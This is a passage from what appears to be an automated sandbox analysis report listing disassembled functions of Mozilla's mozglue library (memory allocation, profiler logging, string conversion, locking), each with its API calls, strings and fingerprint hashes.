                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 4275171209-2186867486
                                                                                                      • Opcode ID: f7e9601943a569b9a0d6a4c9d2a9da03b7e11b09f356301a73e35c5915d491d9
                                                                                                      • Instruction ID: 8fc6fce31a8de4974369ccd82c70d5a8806ca84e0aab9d72a4fcb7456aea3de5
                                                                                                      • Opcode Fuzzy Hash: f7e9601943a569b9a0d6a4c9d2a9da03b7e11b09f356301a73e35c5915d491d9
                                                                                                      • Instruction Fuzzy Hash: DA31A031B452065BFB14AFE98C45BAF7AB5BB46718F204119F625EB780DBB0D400CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF9F100: LoadLibraryW.KERNEL32(shell32,?,6D00D020), ref: 6CF9F122
                                                                                                        • Part of subcall function 6CF9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CF9F132
                                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6CF9ED50
                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF9EDAC
                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CF9EDCC
                                                                                                      • CreateFileW.KERNEL32 ref: 6CF9EE08
                                                                                                      • free.MOZGLUE(00000000), ref: 6CF9EE27
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CF9EE32
                                                                                                        • Part of subcall function 6CF9EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CF9EBB5
                                                                                                        • Part of subcall function 6CF9EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CFCD7F3), ref: 6CF9EBC3
                                                                                                        • Part of subcall function 6CF9EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CFCD7F3), ref: 6CF9EBD6
                                                                                                      Strings
                                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CF9EDC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                      • API String ID: 1980384892-344433685
                                                                                                      • Opcode ID: 81e9aa89518ff87d9d3a527352ea3da72f2519b54a86b2b1742004cf62da8461
                                                                                                      • Instruction ID: aebcf96b7f19edd3b8d5105583ab693a670142a3e010c546f3eb913fcaf4068a
                                                                                                      • Opcode Fuzzy Hash: 81e9aa89518ff87d9d3a527352ea3da72f2519b54a86b2b1742004cf62da8461
                                                                                                      • Instruction Fuzzy Hash: 6451CF71D05204DBEF00EF68C8447EEB7B0BF59318F45842DE8556B790E731A988CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6D00A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6D00A565
                                                                                                        • Part of subcall function 6D00A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D00A4BE
                                                                                                        • Part of subcall function 6D00A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D00A4D6
                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6D00A65B
                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6D00A6B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                      • String ID: 0$z
                                                                                                      • API String ID: 310210123-2584888582
                                                                                                      • Opcode ID: 14bd3debd5bcb6f706fbbb23da1521c40b343318084013f08ee7926219a064b3
                                                                                                      • Instruction ID: 56b3e997d5699be17d1db796b2974bc15b3111ce80696c1ece5841a5d736304d
                                                                                                      • Opcode Fuzzy Hash: 14bd3debd5bcb6f706fbbb23da1521c40b343318084013f08ee7926219a064b3
                                                                                                      • Instruction Fuzzy Hash: 02413971918746AFD741CF28C080A5FBBF4BF89354F508A2EF49987250E730D549CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      Strings
                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CFD947D
                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CFD946B
                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CFD9459
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                      • API String ID: 4042361484-1628757462
                                                                                                      • Opcode ID: f9e098d7a4e62cf4255b9f3124fe15aaa7423193497fc0a437fcfce1d89452d6
                                                                                                      • Instruction ID: 2f32da2cc6295af2bd7e21b0cb889a392425b458f5eb9939e2e191273b11cc1d
                                                                                                      • Opcode Fuzzy Hash: f9e098d7a4e62cf4255b9f3124fe15aaa7423193497fc0a437fcfce1d89452d6
                                                                                                      • Instruction Fuzzy Hash: 7101B5719041118BE700CBDCEC26B5A37B9AB1632DF198236F91A86783DF21FA548957
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6AC
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6D1
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6E3
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B70B
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B71D
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CF9B61E), ref: 6CF9B73F
                                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B760
                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B79A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1394714614-0
                                                                                                      • Opcode ID: 62c69e3623bc97325b907c25529fe2be5517bd46b35e66021820f06d6848980a
                                                                                                      • Instruction ID: ebfe7d6e519a39772da5f2af753a716ed1230a8a96da0ff16caa7c4e0f24ea3a
                                                                                                      • Opcode Fuzzy Hash: 62c69e3623bc97325b907c25529fe2be5517bd46b35e66021820f06d6848980a
                                                                                                      • Instruction Fuzzy Hash: 9E41A5B2D041159FEB14DF68DC806AFB7B9AF45324F250A69E825E7790E731E90087E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6D00B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6D00B5B9
                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6D00B5C5
                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6D00B5DA
                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6D00B5F4
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6D00B605
                                                                                                      • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6D00B61F
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D00B631
                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D00B655
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1276798925-0
                                                                                                      • Opcode ID: f5279710ad21788d7c095528967833cad7cb8a591587e1b6a71d0d7c9bb25f84
                                                                                                      • Instruction ID: 00abf7be7ca2436c7b1db7f019a02e8f2bb7fcd381698893bcdd7af2d6ae4459
                                                                                                      • Opcode Fuzzy Hash: f5279710ad21788d7c095528967833cad7cb8a591587e1b6a71d0d7c9bb25f84
                                                                                                      • Instruction Fuzzy Hash: 1D319772E00605DBDB04DFA9CC55BBEBBB6FF86321F150519D52697340DB30A806CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE1D0F
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6CFE1BE3,?,?,6CFE1D96,00000000), ref: 6CFE1D18
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6CFE1BE3,?,?,6CFE1D96,00000000), ref: 6CFE1D4C
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE1DB7
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFE1DC0
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFE1DDA
                                                                                                        • Part of subcall function 6CFE1EF0: GetCurrentThreadId.KERNEL32 ref: 6CFE1F03
                                                                                                        • Part of subcall function 6CFE1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CFE1DF2,00000000,00000000), ref: 6CFE1F0C
                                                                                                        • Part of subcall function 6CFE1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CFE1F20
                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CFE1DF4
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1880959753-0
                                                                                                      • Opcode ID: 18689d2f04368fa1b31bf65ee2d649e86482c65a8677ed6c464ef0bac92d63d8
                                                                                                      • Instruction ID: bdc83ce7fc79c8a4e4ad3a5a1be315c35064dac5941fae6948a7508d6d83ab94
                                                                                                      • Opcode Fuzzy Hash: 18689d2f04368fa1b31bf65ee2d649e86482c65a8677ed6c464ef0bac92d63d8
                                                                                                      • Instruction Fuzzy Hash: 9C418A75200700AFCB14CF69C889B5ABBF9FB49314F10842DE95A87B42CB71E814CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD84F3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD850A
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD851E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD855B
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD856F
                                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD85AC
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD767F
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD7693
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD76A7
                                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD85B2
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2666944752-0
                                                                                                      • Opcode ID: e303e2ad474659a44642424c9c0e8628654736e7ec0f2a8b55d3cb8818db4b7e
                                                                                                      • Instruction ID: 09f7ccc54a93fc5f31837b9f01ef994813f3bfd66baaef31686a9bb4a318d863
                                                                                                      • Opcode Fuzzy Hash: e303e2ad474659a44642424c9c0e8628654736e7ec0f2a8b55d3cb8818db4b7e
                                                                                                      • Instruction Fuzzy Hash: 7021AE742007019FDB14CB69C888B6AB7B5AF8431DF29082DE55BC3B41DB31F948CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CFA1699
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16CB
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16D7
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16DE
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16E5
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16EC
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CFA16F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 375572348-0
                                                                                                      • Opcode ID: d35146eefd31110ae9b076250c85c14ff9c98e37ad3bb6259bba14a60ced0cf0
                                                                                                      • Instruction ID: 71ca97890a1cd70fbfd406ee924f2da6276f9d82f6bf6bd6ae8ec10feeae15dd
                                                                                                      • Opcode Fuzzy Hash: d35146eefd31110ae9b076250c85c14ff9c98e37ad3bb6259bba14a60ced0cf0
                                                                                                      • Instruction Fuzzy Hash: A421D2B1740208ABFB115BA88C86FBBB37CEFC6704F054528F6459B690C7749D5486A2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF619
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CFDF598), ref: 6CFDF621
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF637
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF645
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF663
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CFDF62A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                      • API String ID: 1579816589-753366533
                                                                                                      • Opcode ID: ba93f555233d4c134be7e9a7f06c08e0a96d396b584ef2d572ec111a2a2e1bca
                                                                                                      • Instruction ID: df9e5b67eda628197ce95200c89f11bb9a25fa40e7b7282b6fbcf4eb8c18da11
                                                                                                      • Opcode Fuzzy Hash: ba93f555233d4c134be7e9a7f06c08e0a96d396b584ef2d572ec111a2a2e1bca
                                                                                                      • Instruction Fuzzy Hash: 8811E372205205ABDA44AFD9CC49FA57BBDFB87358B150019EA1683F01CB72B821CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CFCD9F0,00000000), ref: 6CFA0F1D
                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CFA0F3C
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA0F50
                                                                                                      • FreeLibrary.KERNEL32(?,6CFCD9F0,00000000), ref: 6CFA0F86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
